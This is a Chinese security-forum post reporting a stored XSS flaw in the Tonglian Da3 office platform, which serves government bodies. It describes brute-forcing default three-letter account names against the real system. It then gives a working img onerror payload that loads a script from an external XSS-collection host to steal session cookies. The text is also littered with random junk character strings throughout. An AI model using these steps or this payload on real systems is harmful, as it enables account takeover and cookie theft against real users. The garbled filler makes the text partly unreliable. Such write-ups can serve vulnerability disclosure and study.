中国网络渗透测试联盟

标题: 同联Da3协同办公平台后台通用储存型xss漏洞 [打印本页]

作者: admin    时间: 2018-10-20 20:14
标题: 同联Da3协同办公平台后台通用储存型xss漏洞
! J) b- ^2 c, d5 C( c & q* r& m0 e: ] ( K; W- S: j7 h. `$ K# [* u J2 w, b6 P: O / Q/ |- M' r! k h* U9 M$ x8 H 6 N3 h% Z/ F m2 P2 g! u1 F 8 W$ y( a7 r( J9 X8 l5 y 5 R3 @8 F9 L% V) e, c( a2 d' b6 g2 x: v* N, v; u * ]& R! k# r4 E+ }! w$ S) o# H * y# t- t0 u8 d4 a2 w) x 5 ]( |7 h j2 M* q8 G4 {
, G% q' [, k: h9 b0 V- N

! W* u( ~, R8 D! i3 J8 `3 a 同联Da3协同办公平台后台通用储存型xss漏洞 0 m: P, O! P' N) ^8 o! Z! f% n% X

H) a2 x8 o8 R3 `& [3 I

0 g& T* E+ d9 E6 G9 I' b$ n# n+ z 平台简介:1 N* m! ?& ]( ` v

8 Y0 F2 m* j/ P

v' z1 X+ i" p$ ]& u, E   0 J; C- M1 \0 E4 x5 P* R8 q; A

. q* ~( @/ G) g8 z3 l9 d

. Z# b( y& n2 B5 P- H$ H! A6 i( P 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
0 O/ K5 e: X7 _, p! X 同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
/ {! T4 Y* y) D+ G0 [- U+ q 同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献! 1 G8 ^5 Z/ K# @3 g; I5 ]

2 L. k3 r$ K) F

+ G1 b0 J2 x" c N5 I' e T) [+ y9 {   # E/ b# T% D, h- M$ a5 C3 z

% ?$ F8 u* J/ q8 T

8 {! H7 w, N* D: V( r, Q- S2 Q. @ 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:" F7 g+ I2 W* r2 x

- q! x( W* B- D

2 h- ^) E: [5 l1 O7 O9 v  6 j9 I* @' N2 l+ Y Q; B

3 p& D$ j& G2 n7 F

% L& T! t' Y8 q5 E# T( h4 I3 `) l http://1.1.1.1:7197/cap-aco/#(案例2-) ' [; l% A: n4 c, ~! k: i' ]9 K0 g

+ @# j8 I9 D! e8 Q4 p6 `+ @$ j3 C

4 p$ @: y% N7 Y0 {/ \* g http://www.XXOO.com (案例1-官网网站)8 o5 G% b- d$ r9 p6 d; ^ z

# n. V5 V6 t+ A* v

# |& U2 X }8 Z' q- K0 Z9 q 漏洞详情:( a1 ~; N( W! ~8 d7 ^4 S, r

9 h. Q& V* ^, a } J

5 t" f8 T) M- D6 L, a1 f& F  案例一、7 O( R; T5 }$ m7 D

] K- \2 J! O4 B1 {$ x# }

# r6 z. l* d/ C7 d9 ~ 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试 7 F: G$ P) x4 ~% N6 S a8 V, g

- r1 K3 ?1 J" f6 Z. p0 h1 R

; Y R4 ~+ [9 o% f; p+ p0 {      首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图: , {( a7 T) K, P. w: D1 j

+ [4 C$ ?5 ^$ O% ~4 U

' N1 O( v# L1 v( \1 Z   & Z. x1 K* a/ e* w( `

' x: x5 ?' a: y& H1 b

; u" u* N! l( K+ r @ IMG_256 : k; u( d& ~4 E4 W

' n @1 }) k" h) ~+ W- \6 |

6 y) O# _+ I h( K status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图: ; [, C7 }5 B! g$ q; J9 U3 C/ d

: Q# R$ @5 R; U' U( o0 g

j0 V& ]% m) W   / l: Y0 u4 G# ?9 v. ?. O# b

7 }4 z0 e9 U3 v: S

# k: [) L2 V0 W$ H+ G1 e2 } ; Z/ Q2 D- e1 U' H2 h

4 A3 U. B) i Q' [3 g4 {" z+ l

3 }# t# c7 P' |8 R1 O( x% s' @' ^ 然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下 7 W: @ s' D/ f! L' w

$ d; i" L, ~7 K& E

* K+ L3 K% k5 C2 H# g$ F0 f   % }7 P, o c$ w: [+ F5 G

+ g$ b. @5 T5 c5 u% z5 z# G* G

" F4 O, v6 L9 U' k <img src=x& I, z3 B* z# \1 J onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图: : x: Q( ], a( a5 z

8 Z2 t; _$ X3 l+ a" |# a

' i$ b. I: _9 U4 i. U ' Y1 t) s2 J; C. e) ^; p

' R& r& y6 P7 \; L; \# v% s

% Y. e1 i: d* R* [/ t% f. N& L1 g 然后发送,接收cookie如图: 0 j ?/ ]. Z+ ^' O$ r3 w: P

' E/ t h! p0 z! J9 ?

, |- l) X c' A q5 h4 D   2 `; ] z& _/ d

$ c7 Q3 D+ u3 K

d3 T8 ^) o; w0 }: {. ?   ( ~ @: `+ V$ @

8 g ^$ e5 C" o1 i8 Y* n5 m: `7 u% T, i

! j& z! Z" Z' {; A# j+ U1 U5 f5 f6 I   + ~ r$ [& \- ^

8 d8 h$ y: E8 L

$ G- y. R% N' b, h   5 M3 j" v$ C4 E( S

* p0 m! ?. i' I

2 Y& l4 H( F+ M. {, `: h % m( F" R& U* |. m0 I4 a

& o! W% U! m5 g" M- R

& ]/ `- H& K" o! U$ X9 M! @ , k% k- G- x. N, L" t! F

9 ]- l4 r1 z( d9 Z' k5 x% A

2 f, @, d8 M4 r7 z* B   5 [! Y/ T! m) s+ _4 v; H

W4 K0 J/ i5 Q

6 E7 X- D* v$ q1 p3 k7 o3 D7 R2 M 案例2、 - q; x; X" ~& }4 s- r

# _7 s7 V1 r1 Q, L

: R5 |: X2 {1 r2 P1 I 前面步骤都一样,下面看效果图: 6 {& Q; J+ M2 w& F0 I6 _

2 a4 ~0 P4 h% b/ W& @. E* M. J

$ Y6 m# I5 L% B: {) w " Y; t u: V) G! {" `

, k: U. h! f$ {

6 x$ P$ J4 a0 g" K9 F0 F0 `) Y# D ) S$ W: t5 Z9 b `; v# m+ I& E' D0 p0 `

8 D3 y: Y( ?8 }' U- r' Z9 s

$ J. J, R6 L. h* y. K2 y4 l   4 V5 R+ s* E+ m2 H8 u( l3 F7 }4 N

# e7 n4 q u, F- ~7 g# q/ D2 G

7 Z7 }1 P, S) Y5 o( [* Z7 G' S   : W6 O5 h* Z9 a+ j

" G; _6 O& B/ @5 R! G% l: H& G2 X# O

% _' F7 U2 u+ I1 u% u 2 ]0 N5 Q6 T) v: [, z) q

9 a O# i/ H) K1 Z; C8 {7 u

. b- c) X1 n* X2 ^4 z# b   3 E: z8 Y3 C7 L3 s5 p2 n

% c# b6 f2 f& S# U% X

5 i; Z9 a5 g4 I   9 K7 @( K2 U0 b6 [

F8 K& Z9 S! Q% @

+ o- ]" `- K" n1 T! [8 ^0 p   ! g! P% P9 x$ j- v# l' d/ l( P) V, r3 H

* Y$ s; g. K( H0 z" J

: |' g: Q8 ] B9 P( V& \9 \6 ?# C   4 ?/ U$ q* o2 r6 `2 ~) A1 R0 Z! b

, M5 G+ c! t& w





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2